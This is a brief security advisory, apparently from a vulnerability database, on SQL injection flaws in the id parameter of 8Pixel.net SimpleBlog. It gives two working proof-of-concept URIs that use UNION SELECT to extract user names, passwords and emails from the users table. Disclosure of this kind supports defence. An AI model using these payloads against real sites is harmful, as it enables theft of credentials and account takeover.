• info
• discussion
• exploit
• solution
• references

8Pixel.net SimpleBlog ID Parameter Multiple SQL Injection Vulnerabilities

Attackers can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USE
http://www.example.com/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users